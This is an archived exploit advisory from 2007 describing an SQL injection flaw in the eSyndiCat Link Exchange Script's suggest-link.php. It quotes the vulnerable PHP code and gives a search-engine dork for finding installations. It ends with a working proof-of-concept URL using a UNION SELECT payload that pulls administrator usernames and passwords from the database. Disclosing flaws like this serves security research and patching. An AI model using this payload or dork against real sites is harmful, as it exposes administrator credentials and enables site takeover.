[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : eSyndiCat Link Exchange Script 2005-2006 SQL Injection Vulnerability
# Published : 2007-12-25
# Author : EgiX
# Previous Title : RunCMS 1.6 Multiple Remote Vulnerabilities
# Next Title : WebSihirbazi 5.1.1 (pageid) Remote SQL Injection Vulnerability
--------------------------------------------------------------
eSyndiCat Link Exchange Script - Remote SQL Injection Advisory
--------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.esyndicat.com/
dork.....: "?? 2005-2006 Powered by eSyndiCat Link Exchange Script"
details..: works with magic_quotes_gpc = off
[-] Vulnerable code in /suggest-link.php :
30. /** gets information about current category **/
31. $category =& $gDirDb->getCategoryById($_GET['id']);
32. $gDirSmarty->assign_by_ref('category', $category);
[-] getCategoryById function defined in /classes/Dir.php :
323. function getCategoryById($aCategory)
325. {
326. $sql = "SELECT * FROM `{$this->mPrefix}categories` ";
327. $sql .= "WHERE `id` = '{$aCategory}'";
328.
329. return $this->mDb->getRow($sql);
330. }
[*] An attacker can break database through browser! P.o.C. :
http://[host]/[path]/suggest-link.php?id=-1'/**/UNION/**/SELECT/**/1,1,1,password,1,1,1,1,username,1,1/**/FROM/**/dir_admins/*
# www.Syue.com [2007-12-25]